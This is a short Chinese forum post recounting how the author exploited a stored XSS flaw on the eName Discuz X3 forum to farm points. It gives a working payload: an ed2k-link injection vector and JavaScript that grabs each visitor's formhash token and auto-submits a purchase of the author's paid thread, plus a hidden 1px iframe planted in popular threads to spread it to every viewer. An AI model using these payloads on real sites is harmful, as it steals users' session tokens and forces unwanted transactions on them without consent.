易名中国论坛XSS漏洞可无限刷玉米
易名论坛DISCUZ X3程序,前段时间论坛爆出XSS漏洞,今天正好逛论坛就试了下,然后有了下面的刷玉米(积分)。
随便找个帖子回复,然后插入连接,为了方便后面的刷分 尽量找回复N多页的帖子,插入代码
ed2k://|file|test|'+document.write(String.fromCharCode())+'|test/
这里我插入的是自动购买主题的JS代码:
var vzhi =document.getElementsByName("formhash")[0].value;
document.write('<form id=payform name=payform method=post autocomplete=off action=forum.php?mod=misc&action=pay&paysubmit=yes&infloat=yes><br>')
document.write('<input type=hidden name=formhash value='+vzhi+'><br>')
document.write('<input type=hidden name=referer value=http://www.dnbbs.com/./ ><br>')
document.write('<input type=hidden name=tid value=869290><br>')
/*document.write('<input type=submit name=submit value='+vzhi+'>')*/
document.write('</form><br>')
setTimeout("document.payform.submit()",1000)
这样浏览这个帖子就会自动购买主题ID为869290的主题(主题设置收费),
然后选择热门帖子跟帖 插入另外一个
代码:
document.writeln("<iframe src=\"第一次回复帖子地址\" frameborder=\"0\" scrolling=\"No\" height=\"1px\" width=\"1px\"></iframe>");
然后不知不觉中主题被不断购买。。。
刚刚刷了几千分就被封了。。管理效率挺高的,赞一个。。没啥恶意啊。。。
